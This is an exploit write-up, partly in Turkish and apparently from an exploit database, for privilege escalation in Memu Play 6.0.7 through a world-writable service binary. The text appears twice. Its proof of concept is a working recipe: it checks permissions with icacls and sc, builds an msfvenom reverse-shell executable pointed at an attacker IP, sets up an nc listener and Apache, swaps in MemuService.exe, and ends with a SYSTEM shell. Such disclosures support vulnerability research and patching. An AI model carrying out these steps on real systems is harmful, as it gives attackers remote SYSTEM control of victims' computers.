# Exploit Title/Exploit Başlığı: Memu Play 6.0.7 - Privilege Escalation (PoC)
# Date/Tarih: 20/02/2019
# Exploit Author/Exploit Yazarı: Alejandra SA!nchez
# Vendor Homepage/Yapımcı Websitesi: https://www.memuplay.com/
# Software Link/Yazılım Linki: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Version/Versiyon: 6.0.7
# Tested on /Test Edilen Sistemler : Windows 10 / Windows 7
#Prerequisites / Ön Şartlar:
Yeniden bağlatma özelliğine sahip yerel ağda düşük ayrıcalıklı erişim.
# Details/Ayrıntılar:
Varsayılan kullanıcıların ESM folders/files için aşağıdaki gibi değiştirme yetkileri var.
Düşük bir ayrıcalıklı hesap, bu aynı yolda bulunan MemuService.exe dosyasını yeniden adlandırabilir ve yerel sistem olarak çalışan hizmet nedeniyle sistem seviyesinde ayrıcalıklarla bu dosyayı değiştirip saldırı dosyasını yükleyebilir.
C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone: (I)(F)
BUILTIN\Administrators: (I)(F)
BUILTIN\Users: (I)(F)
NT AUTHORITY\SYSTEM: (I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>sc qc MEmuSVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MEmuSVC
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
LOAD_ORDER_GROUP :
TAG : 0
# Proof of Concept/Kanıt
1. Saldırılan makine üzerinde malicious .exe oluşturun.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe >
/var/www/html/MemuService.exe
2. Dinleyiciyi kurun ve Apache nin makinede çalıştığına emin olun.
nc -lvp 443
service apache2 start
3. malicious .exe yi kurbanın makinesine indirin.
Tarayıcıda http://192.168.1.130/MemuService.exe yazın ve indirin.
4. malicious .exe üzerine yazın ve kopyalayın.
Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
5. Kurbanın makinesini yeniden başlatın.
6. Reserve Shell makinede açılacak .
C:\Windows\system32>whoami
whoami
nt authority\system
Exploit Linki : https://cxsecurity.com/issue/WLB-2019020233
# Date/Tarih: 20/02/2019
# Exploit Author/Exploit Yazarı: Alejandra SA!nchez
# Vendor Homepage/Yapımcı Websitesi: https://www.memuplay.com/
# Software Link/Yazılım Linki: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Version/Versiyon: 6.0.7
# Tested on /Test Edilen Sistemler : Windows 10 / Windows 7
#Prerequisites / Ön Şartlar:
Yeniden bağlatma özelliğine sahip yerel ağda düşük ayrıcalıklı erişim.
# Details/Ayrıntılar:
Varsayılan kullanıcıların ESM folders/files için aşağıdaki gibi değiştirme yetkileri var.
Düşük bir ayrıcalıklı hesap, bu aynı yolda bulunan MemuService.exe dosyasını yeniden adlandırabilir ve yerel sistem olarak çalışan hizmet nedeniyle sistem seviyesinde ayrıcalıklarla bu dosyayı değiştirip saldırı dosyasını yükleyebilir.
C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone: (I)(F)
BUILTIN\Administrators: (I)(F)
BUILTIN\Users: (I)(F)
NT AUTHORITY\SYSTEM: (I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>sc qc MEmuSVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: MEmuSVC
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
LOAD_ORDER_GROUP :
TAG : 0
# Proof of Concept/Kanıt
1. Saldırılan makine üzerinde malicious .exe oluşturun.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe >
/var/www/html/MemuService.exe
2. Dinleyiciyi kurun ve Apache nin makinede çalıştığına emin olun.
nc -lvp 443
service apache2 start
3. malicious .exe yi kurbanın makinesine indirin.
Tarayıcıda http://192.168.1.130/MemuService.exe yazın ve indirin.
4. malicious .exe üzerine yazın ve kopyalayın.
Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
5. Kurbanın makinesini yeniden başlatın.
6. Reserve Shell makinede açılacak .
C:\Windows\system32>whoami
whoami
nt authority\system
Exploit Linki : https://cxsecurity.com/issue/WLB-2019020233